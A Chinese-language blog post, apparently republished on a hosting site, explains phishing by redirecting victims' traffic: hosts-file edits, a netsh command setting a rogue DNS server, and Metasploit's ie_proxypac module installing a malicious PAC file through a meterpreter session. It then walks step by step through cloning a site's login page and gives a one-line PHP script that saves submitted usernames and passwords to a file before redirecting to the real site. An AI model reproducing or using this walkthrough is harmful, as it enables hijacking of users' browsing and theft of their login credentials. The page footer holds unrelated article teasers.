通过.PAC(自动配置代理)文件进行网络钓鱼

0x00 常见网络钓鱼方式

攻击者进行网络钓鱼的方式常有以下几种:

1. 通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现;

2. 通过修改受害者dns来实现;

3. 已经进入路由器,直接修改路由器的DNS。

罗列的并不全,之后遇到的话再补充,上述三种方式很常见。

修改HOSTS文件,即攻击者修改受害者HOSTS文件为如下形式:

127.0.0.1 localhost x.x.x.x www.wooyun.com

这样就受害者访问www.wooyun.com会直接访问到x.x.x.x。在msf中可以使用inject_host脚本来实现。

修改dns进行攻击:

攻击者可是使用如下命令修改受害者的dns地址(管理员身份执行):

C:\Windows\system32>netsh interface ip show interfaces       

Idx  Met   MTU   状态          名称
---  ---  -----  -----------  -------------------
  1   50 4294967295  connected    Loopback Pseudo-Interface 1
 10   10   1500  connected    本地连接       

C:\Windows\system32>netsh interface ip set dns "本地连接" static 192.168.1.100
C:\Windows\system32>ipconfig /all | findstr 192.168.1.100
   DNS 服务器  . . . . . . . . . . . : 192.168.1.100

这样就修改了受害者的DNS地址,之后可以使用msf的 fakedns来架设dns服务器来修改域名的解析地址。

除了直接修改路由器的DNS地址的以上两种方式在某些环境下还是有一些缺点的,例如,一些牛逼的AV会检测到文件的修改而发出报警,除此之外,如果受害者所处内网环境中的防火墙或路由器拦截对外部的DNS请求,修改受害者DNS的攻击方式并不能生效(因为攻击者架设的DNS在外网环境下)。

0x01 通过PAC代理

本文主要介绍的是Metasploit中的一个模块ie_proxypac。通过.PAC(自动配置代理)文件来完全控制IE的用户流量。只需要修改PAC文件,攻击者就能使受害者访问的某个域名指向攻击者的IP。虽然没有修改DNS但是可以达到同样的效果,且这种方式较为隐蔽。已经有很多人使用这种方式进行网络钓鱼。

下面是一个PAC文件示例:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
if (shExpMatch(host, "www.baidu.com")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

这个文件的配置是当受害者访问www.wooyun.com以及www.baidu.com时,他会直接请求到攻击者ip( 192.168.52.129)。

详细的PAC编写请查看http://findproxyforurl.com/pac-functions/。

将以上脚本保存为test.pac,在获取meterpreter会话的基础上使用ie_proxypac脚本:

  1. meterpreter > background   
  2. [*] Backgrounding session 1...  
  3. msf > use post/windows/manage/ie_proxypac  
  4. msf post(ie_proxypac) > set session 1  
  5. session => 1  
  6. msf post(ie_proxypac) > set REMOTE_PAC http://192.168.52.129/test.pac  
  7. REMOTE_PAC => http://192.168.52.129/test.pac  
  8. msf post(ie_proxypac) > show options       
  9.    
  10. Module options (post/windows/manage/ie_proxypac):      
  11.    
  12.    Name           Current Setting         Required  Description  
  13.    ----           ---------------         --------  -----------  
  14.    AUTO_DETECT    false                           yes       Automatically detect settings.  
  15.    DISABLE_PROXY  false                           yes       Disable the proxy server.  
  16.    LOCAL_PAC                                      no        Local PAC file.  
  17.    REMOTE_PAC     http://192.168.52.129/test.pac  no        Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)  
  18.    SESSION        1                               yes       The session to run this module on.  
  19. msf post(ie_proxypac) > exploit       
  20.    
  21. [*] Setting automatic configuration script from local PAC file ...  
  22. [+] Automatic configuration script configured...  
  23. [*] Post module execution completed     

之后打开ie,internet选项->连接->局域网设置:

 

 

可以看到pac已经使用pac文件进行了代理。

代理尽量使用远程代理,因为IE11默认禁止本地代理,如果使用本地代理,代理是无效的。详情测试发现,如果连接了科学,pac代理是失效的。

现在再访问www.baidu.com,www.wooyun.org,会看到已经转移到了我们制定的ip:

 

 

0x02 能做什么

这里我们修改pac文件如下:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

这里ip要改成自己的web的ip,如果受害者请求的网站host为 www.wooyun.org 时,满足规则,然后跳转到我们指定的ip地址,这里我们可以来构造钓鱼。

打开wooyun,右键查看源代码,将所有源代码保存为index.html,放在网站根目录下,因为当受害者请求 http://wooyun.org,其host为 wooyun.org 不满足代理条件,就会直接请求,所以我们把源代码中的www.wooyun.org,改为wooyun.org:

 

 

然后找到url,src,href标签,修改为http://wooyun.org/xxxx 的形式,比如

  1. <link href="/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/> 

修改为

  1. <link href="http://wooyun.org/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/> 

改完以后,基本上就算克隆成功了:

 

 

下来要把登陆页面的的源码复制过来,打开http://www.wooyun.org/user.php?action=login,右键复制源码,保存为user.php,放在网站根目录下,修改源码中的url,src,href。修改完之后,打开index.html文件,定位登录,修改href为 user.php?action=login,修改以后此标签为:

  1. <a href="user.php?action=login">登录</a> | <a href="http://wooyun.org/user.php?action=register" class="reg">注册</a> 

打开user.php,定位用户登录表单,修改表单action为post.php:

  1. <a href="#">用户登录</a></div>  
  2.         </div>  
  3. <form action="post.php" method="POST">    
  4. ..... 

在网站根目录新建post.php,添加如下代码:

  1. <?php $file = 'data.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http://wooyun.org/user.php?action=login" /> 

这样钓鱼站就搭建好了。

当用户登录时:

 

 

点击登陆以后会跳转到http://wooyun.org/user.php?action=login

 

 

查看data.txt:

 

 

只是简单地一个示例,具体可以通过修改pac文件来实现控制浏览器是否进行代理。

0x03 小结

此种方式进行网络钓鱼,做的细致的话,很难被发现,而且隐蔽性好,缺点就是连接科学以后代理将会失效。以上是个人的测试结果,请各位大牛指正。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/146601.html<

(0)
运维的头像运维
上一篇2025-03-11 04:12
下一篇 2025-03-11 04:14

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注